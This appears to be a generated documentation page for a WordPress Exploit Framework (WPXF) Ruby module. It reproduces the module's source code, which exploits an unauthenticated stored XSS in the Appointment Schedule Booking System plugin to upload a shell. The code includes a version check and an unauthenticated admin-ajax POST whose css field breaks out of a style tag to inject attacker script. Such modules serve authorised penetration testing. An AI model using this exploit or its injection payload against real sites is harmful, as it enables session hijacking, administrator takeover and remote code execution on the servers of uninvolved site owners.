class Wpxf::Exploit::AppointmentScheduleBookingSystemStoredXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Appointment Schedule Booking System Unauthenticated Stored XSS Shell Upload', author: [ 'White Fir Design', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8634'], ['URL', 'https://www.pluginvulnerabilities.com/2016/10/03/persistent-cross-site-scripting-xss-vulnerability-in-wordpress-appointment-schedule-booking-system/'] ], date: 'Oct 04 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 23 def check check_plugin_version_from_readme('wp-appointment-schedule-booking-system', '1.1') end
store_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 31 def store_script execute_post_request( url: wordpress_url_admin_ajax, body: { 'action' => 'appointgen_save_cssfixfront', 'cssfix' => 'front', 'css' => "</style></style><script>#{xss_include_script}</script><style>" } ) end
vulnerable_page()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 27 def vulnerable_page 'the page containing the appointment schedule' end